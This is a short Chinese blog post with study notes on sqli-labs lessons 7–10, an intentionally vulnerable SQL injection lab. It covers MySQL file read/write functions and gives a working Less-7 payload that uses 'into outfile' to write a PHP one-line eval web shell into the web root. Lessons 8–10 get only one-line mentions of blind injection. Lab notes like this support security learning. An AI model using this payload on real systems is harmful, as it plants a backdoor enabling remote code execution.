Less 7-10

常用路径:
https://www.cnblogs.com/lcamry/p/5729087.html
文件导入导出操作:

load_file('文件名')      	#导出文件,需要文件的绝对路径
load data infile '文件名'	#向数据库导入文件
Select ... into outfile '文件名' #写入到文件,该文件之前不存在
#当load_file无法导出数据到前端的时候,可以利用该语句将服务器当中的内容导入到 web 服务器下的目录得到数据
select load_file('文件名')into outfile '文件名' 

Less-7

?id=1')) union select 1,2,'<?php @eval($_post["mima"])?>' into outfile "D:\\phpStudy\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\yijuhua.php" --+

在D:\phpStudy\phpstudy_pro\WWW\sqli-labs-master\Less-7\目录下可以看到写入的.php文件,可与工具结合getshell

Less-8

布尔盲注

Less-9、10

时间盲注,正确与错误页面差别不大,不好区分,同时报错函数被屏蔽,无法使用基于报错的盲注
费时间

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值